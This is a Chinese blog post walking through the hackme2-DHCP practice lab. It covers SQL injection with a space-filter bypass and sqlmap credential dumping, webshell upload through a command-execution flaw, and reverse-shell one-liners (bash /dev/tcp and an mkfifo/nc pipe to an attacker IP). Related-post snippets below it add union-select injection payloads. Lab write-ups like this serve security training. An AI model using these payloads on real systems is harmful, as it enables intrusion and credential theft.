hackme2-dhcp靶场记录

最新推荐文章于 2024-06-14 08:30:00 发布
最新推荐文章于 2024-06-14 08:30:00 发布
阅读量1.2k 收藏 3
点赞数 1
分类专栏: web安全 文章标签: web php 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/lionwerson/article/details/120684440
版权

1.下载靶场

下载地址

2.打开虚拟机,导入虚拟机后把网络模式由NAT改为桥接模式,启动。

先用浏览器访问一下80端口,是一个登录,没有验证码,可以试一下爆破。我这里还是先注册一下,不行再爆破。

 

可以注册,注册登录之后发现这是一个图书系统。

搜索一下试试,显示了所有的图书。

 但凡有搜索的地方,先试一下sql注入,抓包看一下,post有search参数,手工测试一下。

 

 search存注入,字符型。联合注入一下,试一下字段数。

 没有注入成功,盲猜是由于过滤了空格用/**/代替一下绕过。

可以,注入成功,剩下的交给sqlmap,右键保存一下抓包记录为1.txt文件,data为指定post参数。

python3 sqlmap.py -r 1.txt -vv --tamper=space2comment --dbms  "MySQL" --level 5 --data="search=1"

 然后获取一下当前的数据库的用户名和密码

python3 sqlmap.py -r a.txt -vv --tamper=space2comment --dbms  "MySQL" --level 5 --data="search=1" -D webapphacking -C "user,pasword" –dump

 解密一下superadmin的密码

登入管理员后台,可以上传文件,先上传图马。

 

上传图马之后,一般都是用文件包含,但这里没有,总之挂代理xray扫描一下。

扫到一个php命令执行,试试。

现在有三种方式写webshell

1通过wget下载后门
2通过上传图片文件包含或者通过命令执行来修改后缀名为php
3直接用命令行写入webshell

直接wget下载shell:

系统命令修改后缀名为php,但是要先知道上传路径,这个可以通过ls命令显示文件,或者用cat查看welcomeadmin.php的源码查看。

/var/www/html/uploads/year2020/

 上传完连接,反弹nc或msf,提权就ok了。

反弹shell有很多种,但是在这个靶机上,bash反弹会报错。

bash -i >& /dev/tcp/ip/port 0>&1

 

 由于默认的nc没有-e选项,可以通过命名管道的方式把bash通过nc反弹出来。

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.0.8 8080 > /tmp/f

 一定要先监听端口,然后再反弹,否则连接不上!

用python升级一下交互式shell

python -c "import pty;pty.spawn('/bin/bash')"

或者用php-reverse-shell进行反弹。

php-reverse-shell

再或者可以用base64加密一下bash反弹命令。

base64混淆

反弹成功之后,再home目录下发现一个奇怪的文件,用cat查看后发现是一个二进制可执行文件。

 执行了一下,居然提权成功,看来这就是这个靶机的最后一步了。

代码审计:

welcome.php:

 welcomeadmin.php

ps:手工测试时,如果单引号不行就换双引号或者括号多试几次。

lionwerson
关注
  • 1
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
vulnhub--hackme2-DHCP
weixin_45922278的博客
02-24 921
描述 “ hackme2”是中等难度级别的框。这是hackme系列的第二部分,其中更多的控制措施可以阻止恶意攻击。此外,您还必须开箱即用,以利用漏洞。目标是通过Web漏洞获得受限的特权访问,然后特权以root用户身份升级。该实验室的创建是为了模拟现实世界中的网络漏洞。 “ hackme2”使用DHCP并可能在mysqld自行关闭(非常罕见的情况)的情况下,尝试强制重启机器,并且随后应能正常工作。 https://idc.wanyunshuju.com/vul/1947.html 一、信息...
Hackme2靶机总结
qq_45301512的博客
12-17 361
(2) 先用最普通的测post的跑一下,发现不行,根据最后的提示,可以加上 –level 参数 和 –tramper=space2comment 参数。看了网上的答案,发现/home/legacy下存在一个touchmenot可执行文件,运行就能提权。使用msfvenom生成一个php的tiquan.php,上传到/var/www/html目录下。=eval 代替
vulnhub靶机:hackme
最新发布
weixin_68416970的博客
06-14 536
猜测superadmin用户是管理员,登录一下试试。存在SQL注入,使用sqlmap工具注入后面的。发现靶机IP是192.168.109.132。登录主页发现登录页面,而且还可以注册用户。从响应数据包可以看出来已经上传到文件夹了。创建用户admin,密码123456。使用dirsearch工具扫描目录。创建完成后登录admin用户。设置网络模式为net模式。发现开放了22、80端口。将得到的密码用md5解密。访问目录扫描出来的路径。发现是一个文件上传页面。复制图片链接用蚁剑连接。发现存在文件上传漏洞。
靶场-hackeme1
weixin_58602402的博客
06-12 140
1.在/home/legacy路径下发现二进制文件touchmenot,执行二进制文件。Linux OS' order by 1# //正常。Linux OS' order by 4# //不正常。3.编写反弹shell的脚本,shell.py,并利用蚁剑上传并执行。Linux OS' order by 3# //正常。Linux OS' and 1=2 # //不正常。Linux OS' and 1=1 # //正常。7.爆破数据库名,用户名,版本号。
HACKME-1 打靶
weixin_57315671的博客
06-16 215
8.查看webapphacking库所有的表 -1' union select group_concat(table_name),2,3 from information_schema.tables where table_schema='webapphacking'#9.查看users表中所有的列 -1' union select group_concat(column_name),2,3 from information_schema.columns where table_name='users'#
hackme 靶场复现
m0_68471358的博客
08-02 284
靶机下载地址:hackme: 1 ~ VulnHubhttps://www.vulnhub.com/entry/hackme-1,330/将靶机下载并导入到VMware虚拟机当中,开启hackme1靶场,并开启kali当作攻击机将两台虚拟机均设为桥接模式二.靶机渗透。
IPV6-dhcp服务器搭建步骤
10-19
isc-dhcp-server 是一个基于 Unix 的 DHCP 服务器软件,支持 IPv4 和 IPv6 双协议栈。使用以下命令安装 isc-dhcp-server: sudo apt update sudo apt-get install isc-dhcp-server 安装完成后,我们需要设置 DHCP ...
glass-isc-dhcp:Glass-ISC DHCP服务器接口
02-04
我已决定将其共享给也觉得有用的任何人可以将更多功能和应用程序级功能扩展到界面中,但我的目标只是满足生产网络需求的高产量功能免责声明:Glass及其作者与ISC和isc-dhcp-server的作者没有关系原始作者:克里斯·...
isc-dhcp-server配置文件.zip
04-07
《isc-dhcp-server配置详解与应用》 isc-dhcp-server是一款广泛应用的动态主机配置协议(DHCP)服务器软件,主要用于自动分配、管理和回收网络设备的IP地址。它支持IPv4和IPv6,使得网络管理员能够高效地管理网络...
commons-dhcp-1.4和pool-1.5.6.rar
09-16
标题中的"commons-dhcp-1.4和pool-1.5.6.rar"指的是一个包含两个Apache Commons组件的压缩文件,分别是Apache Commons DHCP库的1.4版本和Apache Commons Pool库的1.5.6版本。这两个库在IT行业中扮演着重要的角色,...
2-服务篇-DHCP.pdf
04-07
cp /usr/share/doc/dhcp-4.1.1/dhcpd.conf.sample /etc/dhcp/dhcpd.conf ``` - **编辑配置文件**:使用文本编辑器打开 `/etc/dhcp/dhcpd.conf` 文件,根据需要进行编辑。例如,指定分配IP地址的范围、子网掩码、...
LiveHack:黑客马拉松的实时协作和社交平台!
06-09
直播黑客 黑客马拉松的实时协作和社交平台!
vulnhub靶场hackme2-DCHP
weixin_42478365的博客
06-04 718
sql注入(空格绕过),命令执行漏洞(空格绕过)、SUID提权、Burp联动xray
hackme靶场通关
weixin_56594114的博客
08-02 65
模式子网地址,靶机需要也设置成。显示结果,说明闭合方式是'去扫描全网段查看靶机的。
hackme1新手教学
w2411313的博客
10-13 8069
15.输入-1' union select group_concat(user),group_concat(pasword),3 from users#,查看user和password的具体信息,发现用户名其中一个是superadmin,最有可能为管理员账户,得到用户名和密码,但是密码被md5加密。>,点击选择文件进行上传,然后点击upload image。12.输入-1' union select database(),2,3# ,查看数据库具体信息,得到数据库名称为webapphacking。
hackme靶场练习
SYJ_361的博客
03-18 2090
本文对hackme靶场进行练习,运用sql注入漏洞,以及msf木马反弹shell,进而取得root权限
靶机渗透 HACKME-2 (详细渗透,适合新手渗透)
君莫hacker的博客
09-06 3550
靶机HACKME:2的目录0x01靶机描述0x02环境搭建0x03靶机渗透一、 信息收集二、 漏洞挖掘三、 漏洞利用四、 提权0x04实验总结 0x01靶机描述 靶机基本信息: 链接 https://www.vulnhub.com/entry/hackme-2,618/ 作者 x4bx54 发布日期 2020年12月6日 难度 中等 靶机基本介绍: hackme2”是一个中等难度的关卡。这是hackme系列的第二部分,其中有更多的控件用于阻止恶意攻击。此外,你还必须跳出框框来利
vulhub靶场学习日记hackme2
m0_55763479的博客
07-12 315
vulhub靶场学习日记hackme2
isc-dhcp option
02-04
isc-dhcp option是指Internet Systems Consortium Dynamic Host Configuration Protocol (ISC-DHCP)中的一个功能,它允许管理员在DHCP服务器上配置和控制DHCP客户端的一些选项和参数。 ISC-DHCP是一种网络协议,它用于自动分配IP地址、网关、DNS服务器等网络设置,以简化网络管理。在ISC-DHCP服务器上配置并添加option,可以向客户端提供一些额外的选项和参数,以满足特定的网络需求。 ISC-DHCP服务器支持多种不同的option类型,包括基本的网络参数如DNS服务器、域名、时间服务器等,还包括一些自定义的选项。管理员可以在DHCP服务器的配置文件中指定这些option的值,然后将其分配给特定的DHCP客户端。 使用ISC-DHCP option,管理员能够对客户端进行更精细的网络定制。例如,可以通过设置DNS服务器option为特定的IP地址,让客户端在获取IP地址时同时获得正确的DNS服务器信息,从而实现域名解析功能。还可以配置时间服务器option,让客户端同步网络时间。此外,还可以通过其他自定义的option,向客户端提供详细的网络配置信息,如代理服务器、NTP服务器等。 在实际应用中,ISC-DHCP option广泛用于不同类型的网络环境,如企业网络、学校网络、公共无线网络等。它提供了一种简单且灵活的方式,让管理员能够根据具体需求为DHCP客户端提供定制化的网络配置。通过合理配置ISC-DHCP option,可以提高网络的稳定性和性能,并简化网络管理的工作量。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值